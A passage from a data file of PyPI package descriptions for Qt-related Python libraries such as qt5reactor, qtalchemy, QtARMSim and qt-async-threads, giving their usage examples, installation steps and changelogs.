[twisted.test.test_internet]Make sure the plugin directory is in path or in the current directory for\nreactor discovery to work.There is alsopytest-twistedfor use withpytest.\nYou can specify to use the qt5reactor by adding--reactor=qt5reactor."} +{"package": "qt5reactor-fork", "pacakge-description": "Qt5ReactorUsing the QtReactorBefore running / importing any other Twisted code, invoke:app = QApplication(sys.argv) # your code to init QtCore\nfrom twisted.application import reactors\nreactors.installReactor('qt5')orapp = QApplication(sys.argv) # your code to init QtCore\nimport qt5reactor\nqt5reactor.install()Testingtrial --reactor=qt5 [twisted] [twisted.test] [twisted.test.test_internet]Make sure the plugin directory is in path or in the current directory for\nreactor discovery to work.Testing on Python 3trialdoes not work on Python3 yet. Use Twisted\u2019sPython 3 test runnerinstead.Install the reactor before callingunittest.main().import qt5reactor\nqt5reactor.install()\nunittest.main(...)"} +{"package": "qt5-t5darkstyle", "pacakge-description": "Dark Stylesheet for QT5the css and icons were inspired byhttps://github.com/ColinDuquesnoy/QDarkStyleSheetwhich are Copyright (c) 2013-2018 Colin DuquesnoyUsage:from qt5_t5darkstyle import darkstyle_css\nwidget.setStylesheet(darkstyle_css())or set your own colors with:widget.setStylesheet(darkstyle_css(MY_COLORS_DICT))"} +{"package": "qt5-tools", "pacakge-description": "Perhaps docs will follow but for now seethe pyqt-tools readme. This\npackage provides just the wrappers forqt-applications."} +{"package": "qt6-applications", "pacakge-description": "Perhaps docs will follow but for now seethe pyqt-tools readmeandthe qt-tools readme. This package provides just the collection of Qt\napplications to avoid repeating the same large files in several packages for\ndifferent Python versions. These files are not intended to be used directly."} +{"package": "qt6-tools", "pacakge-description": "Perhaps docs will follow but for now seethe pyqt-tools readme. This\npackage provides just the wrappers forqt-applications."} +{"package": "qtable", "pacakge-description": "refer to .md files inhttps://github.com/ihgazni2/qtable"} +{"package": "qtaf", "pacakge-description": "QTAFQTA is a cross-platform test automation tool for servers and native, hybrid and applications.Supported PlatformsiOS (powered byQT4idriver)Android (powered byQT4Adriver)Web (powered byQT4Wdriver)Windows (powered by QT4C driver)macOS (powered by QT4Mac driver))Server (powered by QT4S driver)QTAF (QTA Framework) is a base framework for QTA, including,testbasetuiaTestbaseTestbase is a test framework providing test execution, reporting and management, and is the common base for each platform-specific QTA driver.For more inforamtion about quick startup, usage and API reference, please readtestbase's document.TUIATUIA (Tencent UI Automation) is a base framework for UI test automation, which is used by each platform-specific QTA driver for client.For more inforamtion about quick startup, usage and API reference, please readTUIA's document.QTA\u662f\u4e00\u4e2a\u8de8\u5e73\u53f0\u7684\u6d4b\u8bd5\u81ea\u52a8\u5316\u5de5\u5177\uff0c\u9002\u7528\u4e8e\u540e\u53f0\u3001\u539f\u751f\u6216\u6df7\u5408\u578b\u5ba2\u6237\u7aef\u5e94\u7528\u7684\u6d4b\u8bd5\u3002\u5e73\u53f0\u652f\u6301iOS (\u7531QT4idriver\u63d0\u4f9b)Android (\u7531QT4Adriver\u63d0\u4f9b)Web (\u7531QT4Wdriver\u63d0\u4f9b)Windows (\u7531QT4C driver\u63d0\u4f9b)macOS (\u7531QT4Mac driver\u63d0\u4f9b)Server (\u7531QT4S driver\u63d0\u4f9b)QTAF (QTA Framework)\u662fQTA\u7684\u57fa\u7840\u6846\u67b6\uff0c\u5305\u62ec\u4ee5\u4e0b\u6a21\u5757\uff1atestbasetuiaTestbaseTestbase\u662f\u6d4b\u8bd5\u6846\u67b6\u57fa\u7840\uff0c\u63d0\u4f9b\u5305\u62ec\u6d4b\u8bd5\u6267\u884c\u3001\u62a5\u544a\u548c\u7528\u4f8b\u7ba1\u7406\u7b49\u57fa\u7840\u529f\u80fd\u3002Testbase\u4f1a\u88ab\u5404\u4e2a\u5e73\u53f0\u7684QTA Driver\u6240\u4f7f\u7528\u3002\u5feb\u901f\u5165\u95e8\u3001\u4f7f\u7528\u548c\u63a5\u53e3\u6587\u6863\u8bf7\u53c2\u8003\u300aTestbase\u6587\u6863\u300b\u3002TUIATUIA (Tencent UI Automation)\u662fUI\u81ea\u52a8\u5316\u57fa\u7840\u5e93\uff0c\u4e3aQTA\u5404\u4e2a\u5e73\u53f0\u4e0b\u7684\u5ba2\u6237\u7aefUI\u6d4b\u8bd5Driver\u6240\u4f7f\u7528\u3002\u5feb\u901f\u5165\u95e8\u3001\u4f7f\u7528\u548c\u63a5\u53e3\u6587\u6863\u8bf7\u53c2\u8003\u300aTUIA\u6587\u6863\u300b\u3002\u6b22\u8fce\u52a0\u5165QQ\u7fa4\uff08432699528\uff09\u4ea4\u6d41\u4f7f\u7528\u548c\u53cd\u9988"} +{"package": "qt-aider", "pacakge-description": "qt-aiderAn extension library for Qt libraryLicense: Apache-2.0Documentation:https://qt-aider.readthedocs.io.FeaturesTODOCreditsThis package was created withCookiecutterand thePyPackageTemplateproject template.This library is an extension library build on top of Qt library.History0.3.0 (2019-01-09)Renamed from \u2018rabird.qt\u2019 to \u2018qt-aider\u2019"} +{"package": "qtalchemy", "pacakge-description": "IntroductionThe QtAlchemy library is a collection of Qt Model-View classes and helper\nfunctions to aid in rapid development of desktop database applications. It\naims to provide a strong API for exposing foreign key relationships in elegant\nand immediate ways to the user of applications. Context menus, searches and\ncombo-boxes and tabbed interfaces are all utilized. The use of SQLAlchemy\nmakes it possible that these features are supported on a variety of database\nbackends with virtually no code changes.The Command class gives a way to construct menus and toolbars from decorated\npython functions. The power of this becomes more evident when bound to a view\nwhere the command function can then receive the identifier of the selected item\nof the view. This provides a flexible way to link commands to any sqlalchemy\nquery generated views.Documentation is available athttp://qtalchemy.org.QtAlchemy is currently being developed with Python 2.7.x, SQLAlchemy 0.8.x and\nPySide 1.2.x. Testing has been done on Python 3.3.2 and 2.7.5. SQLAlchemy\ntested versions include 0.8.2 and 0.9-pre. Testing includes linux and Windows\ntargets.As of QtAlchemy version 0.8.x, QtAlchemy uses PySide. See licensing comments\nat the bottom of this file. To use PyQt4 instead of PySide, you must install\nfrom the source in the bitbucket repository rather than PyPI since you need to\nconvert the source before running the install script. Install in the following\nway:python qtbindings.py --platform=PyQt4\npython setup.py build\nsudo python setup.py installExampleIn the interests of being concise, the example given here does not reference a\ndatabase.The UserAttr property class provides yet another type defined python property.\nThe purpose of reinventing this was to ensure that we could interact with our\nmodels sufficiently and provide a uniform experience for SQLAlchemy column\nproperties and UserAttr properties.>>> from qtalchemy import UserAttr\n>>> import datetime\n>>> class Person(object):\n... name=UserAttr(str,\"Name\")\n... birth_date=UserAttr(datetime.date,\"Birth Date\")\n... age=UserAttr(int,\"Age (days)\",readonly=True)\n...\n... @age.on_get\n... def age_getter(self):\n... return (datetime.date.today()-self.birth_date).daysWith this declaration, we can declare a person and compute their age:>>> me = Person()\n>>> me.name = \"Joel\"\n>>> me.birth_date = datetime.date(1979,1,9)\n>>> me.age #depends on today! -- #doctest: +SKIP\n11746\n>>> me.age-(datetime.date.today()-datetime.date(2011,1,9)).days # on birthday 1<<5\n11688We can create a dialog showing the name & birth-date. The main magic happens\nin the addBoundForm call which obtains labels from the UserAttr classes and\nplaces the correct edit widgets on screen.>>> from PySide import QtCore, QtGui\n>>> from qtalchemy import MapperMixin, LayoutLayout, ButtonBoxButton, LayoutWidget\n>>>\n>>> class PersonEdit(QtGui.QDialog,MapperMixin):\n... def __init__(self,parent,person):\n... QtGui.QDialog.__init__(self,parent)\n... MapperMixin.__init__(self)\n...\n... self.person = person\n...\n... vbox = QtGui.QVBoxLayout(self)\n... mm = self.mapClass(Person)\n... mm.addBoundForm(vbox,[\"name\",\"birth_date\"])\n... mm.connect_instance(self.person)\n...\n... buttons = LayoutWidget(vbox,QtGui.QDialogButtonBox())\n... self.close_button = ButtonBoxButton(buttons,QtGui.QDialogButtonBox.Ok)\n... buttons.accepted.connect(self.btnClose)\n...\n... def btnClose(self):\n... self.submit() # changes descend to model on focus-change; ensure receiving the current focus\n... self.close()And, now, we only need some app code to actually kick this off>>> app = QtGui.QApplication([])\n>>> sam = Person()\n>>> sam.name = \"Samuel\"\n>>> d = PersonEdit(None,sam)\n>>> d.exec_() # gui interaction -- #doctest: +SKIP\n0\n>>> sam.age # assumes selection of yesterday in the gui -- #doctest: +SKIP\n1DevelopmentQtAlchemy is still in heavy core development as schedule allows. Major new\nemphases include:abstracting query building for lists allowing user sorting and additional\ncolumnshtml generation for use with the QtWebKit bridgeqml view for queriesChangelog0.8.3:Python 3 support! No 2to3 or other gotchas.SQLAlchemy 0.9x compatibility fixes0.8.2:sqlalchemy 0.8x compatibility fixesmore PySide fixes0.8.1:mainly bugfixes for PySide support0.8.0:Change to PySide as default importsRelax license from GPL to LGPLImprove yoke change handlingCreate new PopupKeyListing for foreign key entry0.7.1:QueryDataView gained basic ability to requery on column header clicks for\nsortinga few doc fixesnew helper function family for using Geraldo in qtalchemy.ext.reporttools0.7.0:improved exception error handling and reporting for GUI applications with-out\nconsolenew yoke supporting a combo boximprove yoke documentationadd complete examples to front of documentationvarious model/list improvements including column width defaulting0.6.12:BoundCommandMenu has slots to be dispatched from html binding entity commands to\nhtml viewing formsstructured load and save extending the framework in BoundDialognew TreeView exposing the QTreeViewtree model support in PBTableModelimproved PySide portability and fixed various crash-bugs related to that0.6.11:context sensitive help and status tips for fieldsnew preCommand/refresh signals with CommandEvent structure allowing aborting by the ambient screenimprovements in the generic data import wizardtable view improvements (bug fixes, corrected model updates to be more precise)use pywin32 ShellExecute instead of os.system for better windows support0.6.10:renamed to qtalchemyexposed Qt\u2019s association of icons with commands appearing in menus and toolbarsmoved qtalchemy.PBTable to qtalchemy.widgets.TableViewnew qtalchemy.ext module for common dialogs (a data import wizard for now)0.6.9:wrote a broad outline of documentationadded boolean, time, and formatted text input yokesrewrote DialogGeo as WindowGeometry saving and restoring window and splitter\ngeometry for arbitrary windowsbrand new command structure replacing DomainEntity0.6.8:color and font control in the python business object layerimproved packaging support for windowsQGridLayout support in WidgetAttributeMapperextended UserAttr value storage to include attribute paths (e.g. self.sub.sub1.value)new QtAlchemy.xplatform module for cross platform helpersrewrote WidgetAttributeMapper using InputYoke methodologyrename PBEventMappedBase to ModelObjectadditions and corrections to examplesevent model corrections (more needed)0.6:new QtAlchemy.widgets sub-module for QLineEdit derived classes (others in the future)new QtAlchemy.dialogs sub-module for auth dialog classescontinued tweaks for PySide and nosetests0.5.1first usable (??) releaseLicenseQtAlchemy is licensed under the LGPL now that it defaults to shipping with\nPySide imports. I find this to be a rather unique licensing situation that we\nnow have with PyQt4 and PySide. I can write my code for PySide and LGPL it and\nit is totally legitimate. However, it also seems entirely legitimate for a\nuser of my library to switch the imports from PySide to PyQt4 \u2026 but then\nyou will need to consult a lawyer about the license for that amalgamation since\ndepending on PyQt4 requires the library to be GPL."} +{"package": "qtalib", "pacakge-description": "QTALIB: Quantitative Technical Analysis LibraryLatest update on 2022-12-18Technical indicators implemented in Cython/C. This is supposed to be a\nfaster technical analysis library with perfect integration to Python.Available technical indicatorsSimple Moving Average (SMA)Exponential Moving Average (EMA)Moving Average Convergence Divergence (MACD)Moving Standard Deviation function (MSTD)Relative Strength Index (RSI)True Range (TR)Absolute True Range (ATR)(Parabolic) Stop and Reverse (SAR)Super Trend (ST)Time Segmented Volume (TSV)On Balance Volume (OBV)Cyclicality (CLC)InstallationYou may run the folllowing command to install QTalib immediately:# Virtual environment is recommended (python 3.8 or above is supported)>>condacreate-nqtalibpython=3.8>>condaactivateqtalib# (Recommend) Install latest version from github>>pipinstallgit+https://github.com/josephchenhk/qtalib@main# Alternatively, install stable version from pip (currently version 0.0.2)>>pipinstallqtalibUsageimportnumpyasnpimportqtalib.indicatorsastavalues=np.array([12.0,14.0,64.0,32.0,53.0])# Simple Moving Average# [30. 36.66666667 49.66666667]print(ta.SMA(values,3))# Exponential Moving Average# [12. 13.33333333 42.28571429 36.8 45.16129032]print(ta.EMA(values,3))ContributingFork it (https://github.com/josephchenhk/qtalib/fork)Study how it's implemented.Create your feature branch (git checkout -b my-new-feature).Useflake8to ensure your code format\ncomplies with PEP8.Commit your changes (git commit -am 'Add some feature').Push to the branch (git push origin my-new-feature).Create a new Pull Request."} +{"package": "qtap", "pacakge-description": "Automatic Qt parameter entry widgets using function signaturesInstall using pip:pip install qtapBasic usage:fromPyQt5importQtWidgetsfromqtapimportFunctionsfrompyqtgraph.consoleimportConsoleWidgetdeffunc_A(a:int=1,b:float=3.14,c:str='yay',d:bool=True):passdeffunc_B(x:float=50,y:int=2.7,u:str='bah'):passif__name__=='__main__':app=QtWidgets.QApplication([])# just pass your functions as a list, that's it!functions=Functions([func_A,func_B])console=ConsoleWidget(parent=functions,namespace={'this':functions})functions.main_layout.addWidget(console)functions.show()app.exec()"} +{"package": "qtape", "pacakge-description": "There will be a preprint soon that explains the method! This package\nprovides a python API to an efficient C++ implementation. The python\nAPI does not provide much documentation, it just exposes the\nunderlying C++ class methods in src/qtape/ctape.h and\nsrc/qtape/ctape.cpp. Documentation for ctape.h is provided\ntherein. Doxygen documentation is available at:https://polybox.ethz.ch/index.php/s/UdFEQB9JrQJD5enTo view the docs, download and unzip the file from the link, and then\nopen html/index.html in your browser.Installationpython3-mpip install qtapeExampleFor a simple example seeexamples/simple_ex.py"} +{"package": "qtapi2", "pacakge-description": "No description available on PyPI."} +{"package": "qtapputils", "pacakge-description": "The qtapputils module provides various utilities for building Qt applications in Python."} +{"package": "qtarmsim", "pacakge-description": "QtARMSim is an easy to use graphical ARM simulator. It provides an easy\nto use multiplatform ARM emulation environment that has been designed\nfor Computer Architecture introductory courses.The ARMSim ARM simulator, Copyright (c) 2014-20 by Germ\u00e1n Fabregat, is\nbundled with QtARMSim. It can be found on thearmsim/subdirectory of the QtARMSim installation path.1. Installing QtARMSimIn order to install QtARMSim, its dependencies should be installed first.QtARMSim has the following dependencies:Python3,Qt for Python (PySide6), and ARMSim.ARMSim, which is bundled with QtARMSim, has in turn the next dependencies:Rubyand theGNU GCC Arm toolchain.The next subsections describe how to install QtARMSim and its dependencies on\nGNU/Linux, Windows and macOS.1.1 Installing QtARMSim on GNU/LinuxThe major GNU/Linux distributions already provide packages forPython3andRuby. Therefore, the provided package manager can be used to install them.\nAs for the GNU GCC, the required part of the GNU GCC Arm toolchain is bundled\nwith QtARMSim. Finally,Qt for PythonandQtARMSimcan be installed\nusing thepip3command provided byPython3.For example, on Ubuntu you can install QtARMSim using:$sudoaptinstallpython3-piprubylibxcb-xinerama0$sudogeminstallshelle2mmapsync$sudopip3installQtARMSimOn a Gentoo distribution, you can install QtARMSim issuing (as root):#emerge-avpipruby#pip3install--userQtARMSimIf you are installing QtARMSim on a system where PySide6 is already provided as\na package, you can install the packaged version of PySide6 and then install\nQtARMSim using the--no-depsoption (be aware that the packaged version can\nbe not so to up to date as the one obtained from pip). Once the PySide6\npackage(s) are installed, QtARMSim should be installed as follows:#sudopip3install--no-depsQtARMSim1.2 Installing QtARMSim on WindowsTo install QtARMSim on Windows please follow the next steps:Download a 64 bitsPython executable installerfromPython releases for Windows.\nDuring the installation process, please select theAdd Python 3.X to PATHoption.Download a 64 bitsRuby with Devkitinstaller fromRuby Installer for Windows.\nDuring the installation process, make sure that theAdd Ruby executables to your PATHoption is selected.Open a Windows console (executing eitherWindows PowerShellorcmd, depending on your Windows version), and execute the commands\nindicated in the next steps.3.1. Install theshell,e2mmapandsyncRuby modules with:PSC:\\Users\\Username>geminstallshelle2mmapsync3.2. Install QtARMSim using thepip3command:PSC:\\Users\\Username>pip3installQtARMSim1.3 Installing QtARMSim on macOSTo install QtARMSim on macOS, please follow the next steps:Download and installPython 3from thePython downloads page.Open aTerminaland execute the next command:$sudo-Hpip3installQtARMSimAfter doing the previous steps, you should be able to execute QtARMSim by\ntypingqtarmsimon anewTerminal.Note: If an error message appeared when executing thepip3command saying that\nthere was no matching distribution of PySide6 for your macOS version, you can\ninstead install PySide6 withMacPortsand QtARMSim with no\ndependencies using the following commands (MacPorts should be installed\npreviously):$sudoportinstallpy39-pyside6# same version as the installed Python$sudo-Hpip3install--no-depsQtARMSim1.4 Installing theGNU GCC Arm toolchain(optional)Starting with version 0.3.1 of QtARMSim, the required part of theGNU GCC Arm toolchainis already bundled with QtARMSim. So this step should only be done\nif there is a problem with the bundled GNU GCC Arm toolchain (i.e., QtARMSim\nis not able to assemble any source code).In this case, another instance of GNU GCC Arm toolchain can be installed and used.On GNU/Linux, this can be accomplished by installing a GNU GCC ARM package\nprovided by the GNU/Linux distribution being used, by building a cross-compiling\ntoolchain, or by extracting thegcc-arm-none-eabi-????-linux.tar.bz2file from theGNU Arm Embedded Toolchain Downloads page.For example, on Ubuntu, this optional step can be achieved with:$sudoaptinstallgcc-arm-linux-gnueabiAnd on Gentoo with:#emerge-avcrossdev#echo\"PORTDIR_OVERLAY=/usr/local/portage\">>/etc/portage/make.conf#crossdev--targetarm--ov-output/usr/local/portageOn Windows and macOS, to perform this optional step, download and execute the\nrespective Windows or macOS GNU GCC Arm toolchain package from theGNU Arm Embedded Toolchain Downloads page.Once a newGNU GCC Arm toolchainis installed, please\nconfigure theARMSim Gcc CompilerQtARMSim option to point to the newarm-none-eabi-gccexecutable.2. Executing QtARMSimTo execute QtARMSim, run theqtarmsimcommand, or click on the corresponding\nentry on the applications menu (on GNU/Linux, under theEducation:Sciencecategory).3. Upgrading QtARMSimTo upgrade an already installed version of QtARMSim, execute the following\ncommand on GNU/Linux:$sudopip3install--upgradeQtARMSimOn Windows:PSC:\\Users\\Username>pip3install--upgradeQtARMSimOn macOS:sudo -H pip3 install --upgrade QtARMSim4. Uninstalling QtARMSimTo uninstall QtARMSim on GNU/Linux, execute the following command:$sudopip3uninstallQtARMSimOn Windows:PSC:\\Users\\Username>pip3uninstallQtARMSimOn macOS:sudo -H pip3 uninstall QtARMSim5. Installation related known issuesIf something goes wrong after installing QtARMSim, executing theqtarmsimcommand on a terminal could give some insight of what is the error cause.The next known issues should not occur if the installation instructions are\nfollowed to the letter. They are listed here just in case they can be of some\nhelp when upgrading a previously installed version.The 5.14 packaged version of PySide2 on Ubuntu 20.04 LTS does not properly\ndisplay some icons and SVG images of QtARMSim. This can be solved by\ninstalling a newer version of PySide2 usingpip:$ sudo pip3 install PySide2On Ubuntu 20.04 LTS, if the next error is shown when executing QtARMSim from\na terminal:qt.qpa.plugin: Could not load the Qt platform plugin \"xcb\" in \"\" even though it was found.\n[...]It can be solved by installing the packagelibxcb-xinerama0:$ sudo apt install libxcb-xinerama0Starting with the 2.5 version of the Ruby installer,shell,e2mmapandsyncruby modules are no longer bundled in. Therefore, they must be\nmanually installed using thegemcommand, as stated in the general\ninstructions.Versions 5.12.0 and 5.12.1 of PySide2 introduced some changes that prevented\nQtARMSim to work. Version 5.12.2 of PySide2 corrected these regressions.LicenseCopyright 2014-20 Sergio Barrachina Mir This program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation; either version 3 of the License, or (at\nyour option) any later version.This program is distributed in the hope that it will be useful, but\nWITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\nGeneral Public License for more details.You should have received a copy of the GNU General Public License\nalong with this program. If not, see .3rd party software acknowledgmentsThe next 3rd party software is used and distributed with QtARMSim.ARMSim: an ARM simulator, copyright Germ\u00e1n Fabregat Llueca, licensed\nunder the GPLv3+. Included under theqtarmsim/armsimdirectory.GCC, the GNU Compiler Collection,\ncopyright the Free Software Foundation, Inc, licensed under the GPLv3,\nwith the addition under section 7 of an exception described in the \u201cGCC\nRuntime Library Exception, version 3.1\u201d\n(see ).\nBinary versions targeting the ARM EABI are included under theqtarmsim/gcc-armdirectory.Qfplib: an ARM Cortex-M0 floating-point library in 1 kbyte, copyright Mark Owen,\nlicensed under the GPLv2. Source code\nincluded under the3rdparty/directory. This part of the code\nis only available under the GPLv2 license.AlphaSmart 3000font,\ndesigned by Colonel Sanders. Included under the3rdparty/directory.Changelog1.0.1 (2023-11-28)Fixed the way an ARM macOS is detected.1.0.0 (2023-11-03)Migrated from PySide2 to PySide6.Updated the bundled GNU GCC (cross) compilers and added the win64 and ARM macOS versions.Added the font increase and decrease functionality to the registers and memory panels.0.5.5 (2021-10-28)Fixed bug with macOS BigSur and PySide2.0.5.4 (2021-05-27)Fixed incompatibility with Ruby 3.0.0.5.3 (2020-11-06)Updated the installation instructions.A newer 64 bit GNU GCC Arm toolchain for macOS has been included.0.5.2 (2020-06-20)Updated the installation instructions.Updated post installation hook for linux.Post installation code reorganized to allow post_install to be installed as a script.0.5.1 (2020-06-13)Reformatted post_install code and added a hook for linux.Changed default QtARMSim icon by the SVG version.Moved post_install.py script outside of qtarmsim module to avoid its dependency on PySide2 (under certain circumstances, post-install is called before the PySide2 dependency is installed).0.5.0 (2020-05-25)Visualization improvements, especially on the trace ribbon (left area of the simulator).The registers at the register dock are now highlighted when a register is highlighted in the editor or in the simulator.Added Full Screen mode.Added new Compact layout. Hides everything but the registers and memory docks (which are stacked at the left) and the Edit/Simulation widget (which takes the rest of the window).The ARMSim path and GNU compiler path are tested on initialization. If they are no longer valid (usually due to a system python update), they are replaced by their default values.Improved the QtARMSim installation and integration on GNU/Linux, Windows and macOS. On GNU/Linux, the KDE expected mime type for assembler editors has been added. On Windows, a menu entry and a desktop shortcut are now created. On macOS, the qtarmsim script is automatically copied on /opt/local/bin/.Added a simulator output panel that displays the stdout of ARMSim (available only in debug mode).Fixed a bug in ARMSim due to GCC trimming the lines of the LST file at a fixed number of bytes, which under certain circumstances could lead to split a multi byte UTF-8 character and provoke an exception.0.4.19 (2020-05-05)Fixed bug: \u2018QPaintDevice: Cannot destroy paint device that is being painted\u2019.Updated ARMSim version.0.4.18 (2020-05-05)Fixed bug: assigning a PIPE to armsim stdout prevented the Windows version to work properly.0.4.17 (2020-05-04)Updated installation instructions for Windows systems.0.4.16 (2019-11-08)Added the Show/Hide tabs and spaces functionality (on the editor contextual menu).Saved files are forced to end with a new line (to avoid misleading the gcc compiler if the last line ended with a TAB).Added zoom in and zoom out via CTRL++ and CTRL+- (CTRL+wheel already was there).Tab width is now correctly computed.0.4.15 (2019-07-15)Added theprintfsubroutine to the ARMSim firmware.0.4.12 (2019-04-24)PySide2 5.12.2 has corrected the previously changed signature of QAbstractItemModel.createIndex(). The INSTALL documentation has been modified to no longer force the installation of PySide2 5.11.0.4.11 (2019-01-21)PySide2 5.12 has changed the signature of QAbstractItemModel.createIndex(), as it seems that they are going to do a regression, the INSTALL documentation has been changed to force the installation of the previous 5.11.2 version of PySide2.0.4.10 (2018-11-20)Added an scroll area inside the LCD Display dock widget (so that the LCD width does not force the whole simulator width).Changed LCD font to \u201cAlphaSmart 3000\u201d by Colonel Sanders.Added a new example of floating point operations usage,triangle.s, under \u2018File > Examples > Floating point\u2019 menu.0.4.9 (2018-10-16)Changed LCD font to \u201c1 Digit\u201d by David Chung.Fixed bug that prevented code to be resized.0.4.8 (2018-10-8)Properly acknowledging Qfplib by Mark Owen.0.4.7 (2018-7-27)Added memory contents tooltips.Added new example, LCD/ascii, and revised previous ones.Changed the way the monospaced font is selected.0.4.4 (2018-7-25)Migrated to Qt for Python (PySide2).Speeded up the filling of the simulator data.Added examples as a File menu entry.Added ARMSim tabs to separate the source code of the different ROMs.Added Qfplib (floating point library) API documentation to the help.Added UseLabels ARMSim option.Memory dock: first RAM is expanded by default and whenever a memory entry is modified it scrolls to its position.0.3.16 (2018-1-17)Corrected typo on the restructured text format of the changelog documentation.0.3.15 (2018-1-17)Added support in the simulator to showing jump labels instead of\ntheir addresses.Corrected errata on Qfp library acknowledgments.Removed legacy code from GlSpim.0.3.14 (2017-11-08)Added SVG icon support explicitly: the toolbar icons now will be\nalso shown on Windows.ARMSyntaxHighlighter rules are now generated only the first time.ARMSim:\n- Added support for floating point operations including Qfplib: an ARM Cortex-M0 floating-point library in 1 kbyte.\n- Corrected minor bug: .global declared labels generated a linking error.\n- Corrected minor bug: negative displacements on \u2018bl\u2019 instructions where incorrectly displayed.0.3.13 (2017-11-02)Added preliminary printing support.0.3.12 (2017-04-21)Changed the icon set to the KDE Breeze one.LCD Display not rescaling correctly on some desktop environments\nfixed.LCD display can now be zoomed with CTRL+mouse wheel.Editors and panels now honor the system default point size.Now the menu bar is displayed on the system menu bar on Mac OS X.0.3.11 (2016-10-30)The Edit menu actions have been implemented.Settings values are now automatically stripped to avoid errors due\nto misplaced spaces.ARMSim: updated firmware to correct a bug on sdivide subroutine.0.3.10 (2016-09-19)ARMSim: updated firmware to provide a signed division subroutine.0.3.8 (2016-09-19)Bug corrected: waiting spinner occluded File and Edit menus.0.3.7 (2016-09-18)Added firmware ROM that provides, among others, functions to display\nstrings and numbers on the LCD display. The new memory organization\nconsists of two ROM blocks and two RAM blocks. The first ROM block\nis filled with the assembled user code. The second ROM, with the\nfirmware machine code. The first RAM can be used to store the user\nprogram data. The second RAM is used by the LCD display.The graphical interface now uses a thread to retrieve the memory\ncontents and the disassembled code from the two ROM blocks.The regular expressions used to highlight the code on the editors\nhave been optimized to increase the highlighting process speed.0.3.5 (2016-09-12)Improved the Mac OS X compatibility and added installation\ninstructions for this platform.Changed the minimum size of the code editor container to accommodate\nlower resolution screens.ARMSim: (i) LSL result is now bounded to 32 bits; (ii) command\nredirection is performed explicitly to avoid an error on newer\nWindows versions; and (iii) the method used to compare whether\nmemory blocks where not defined has been changed to avoid errors on\nRuby with version >= 2.3.0.3.4 (2016-01-21)Added a memory dump dock widget that allows to see and edit the\nmemory at byte level. It also shows the ASCII equivalent of each\nbyte.Added a LCD display dock widget that provides a simple output\nsystem. It has a size of 32x6 and each character is mapped to a\nmemory position starting a 0x20070000.0.3.3 (2015-11-28)Added a visual indication of which instructions have already been\nexecuted on the left margin of the ARMSim panel.Added automatic scroll on simulation mode in order to keep the next\nline that is going to be executed visible.Improved the automatic selection of a mono spaced font (previously\nselected font used ligatures).Fixed an error on the Preferences Dialog which prevented to select\ntheARMSim directoryand theGcc ARM command lineusing the\ncorresponding directory/file selector dialogs.ARMSim: Fixed the simulation of shift instructions: only the 8 least\nsignificant bits are now used to obtain the shift amount.ARMSim.: Fixed the behavior when memory outside the current memory\nmap is accessed: each wrong access now raises a memory access error.Bundled a reduced set of the GNU compiler toolchain. To reduce the\npackage size, only those files actually required to assemble an\nassembly source code have been included.0.3.0 (2015-06-09)Migrated from PyQt to PySide to allow a simpler installation of\nQtARMSim.Developed a new source code editor based on QPlainTextEdit, though\nremoving the prior QScintilla dependency, which allows a simpler\ninstallation of QtARMSim.Improved the ARM Assembler syntax highlighting.0.2.7 (2014-11-05)Last revision of the first functional QtARMSim implementation. This\nimplementation was used on the first semester of an introductory\ncourse on Computer Architecture at Jaume I University. This is the\nlast version of that implementation, which used PyQt and QScintilla."} +{"package": "qtask", "pacakge-description": "UNKNOWN"} +{"package": "qtasktimer", "pacakge-description": "No description available on PyPI."} +{"package": "qtasync", "pacakge-description": "No description available on PyPI."} +{"package": "qt-async-threads", "pacakge-description": "qt-async-threadsallows Qt applications to use convenientasync/awaitsyntax to run\ncomputational intensive or IO operations in threads, selectively changing the code slightly\nto provide a more responsive UI.The objective of this library is to provide a simple and convenient way to improve\nUI responsiveness in existing Qt applications by usingasync/await, while\nat the same time not requiring large scale refactorings.SupportsPyQt5,PyQt6,PySide2, andPySide6thanks toqtpy.ExampleThe widget below downloads pictures of cats when the user clicks on a button (some parts omitted for brevity):classCatsWidget(QWidget):def__init__(self,parent:QWidget)->None:...self.download_button.clicked.connect(self._on_download_button_clicked)def_on_download_button_clicked(self,checked:bool=False)->None:self.progress_label.setText(\"Searching...\")api_url=\"https://api.thecatapi.com/v1/images/search\"foriinrange(10):try:# Search.search_response=requests.get(api_url)self.progress_label.setText(\"Found, downloading...\")# Download.url=search_response.json()[0][\"url\"]download_response=requests.get(url)exceptConnectionErrorase:QMessageBox.critical(self,\"Error\",f\"Error:{e}\")returnself._save_image_file(download_response)self.progress_label.setText(f\"Done downloading image{i}.\")self.progress_label.setText(f\"Done,{downloaded_count}cats downloaded\")This works well, but while the pictures are being downloaded the UI will freeze a bit,\nbecoming unresponsive.Withqt-async-threads, we can easily change the code to:classCatsWidget(QWidget):def__init__(self,runner:QtAsyncRunner,parent:QWidget)->None:...# QtAsyncRunner allows us to submit code to threads, and# provide a way to connect async functions to Qt slots.self.runner=runner# `to_sync` returns a slot that Qt's signals can call, but will# allow it to asynchronously run code in threads.self.download_button.clicked.connect(self.runner.to_sync(self._on_download_button_clicked))asyncdef_on_download_button_clicked(self,checked:bool=False)->None:self.progress_label.setText(\"Searching...\")api_url=\"https://api.thecatapi.com/v1/images/search\"foriinrange(10):try:# Search.# `self.runner.run` calls requests.get() in a thread,# but without blocking the main event loop.search_response=awaitself.runner.run(requests.get,api_url)self.progress_label.setText(\"Found, downloading...\")# Download.url=search_response.json()[0][\"url\"]download_response=awaitself.runner.run(requests.get,url)exceptConnectionErrorase:QMessageBox.critical(self,\"Error\",f\"Error:{e}\")returnself._save_image_file(download_response)self.progress_label.setText(f\"Done downloading image{i}.\")self.progress_label.setText(f\"Done,{downloaded_count}cats downloaded\")By using aQtAsyncRunnerinstance and changing the slot to anasyncfunction, therunner.runcalls\nwill run the requests in a thread, without blocking the Qt event loop, making the UI snappy and responsive.Thanks to theasync/awaitsyntax, we can keep the entire flow in the same function as before,\nincluding handling exceptions naturally.We could rewrite the first example using aThreadPoolExecutororQThreads,\nbut that would require a significant rewrite.DocumentationFor full documentation, please seehttps://qt-async-threads.readthedocs.io/en/latest.Differences with other librariesThere are excellent libraries that allow to use async frameworks with Qt:qasyncintegrates withasyncioqtriointegrates withtrioThose libraries fully integrate with their respective frameworks, allowing the application to asynchronously communicate\nwith sockets, threads, file system, tasks, cancellation systems, use other async libraries\n(such ashttpx), etc.They are very powerful in their own right, however they have one downside in that they require 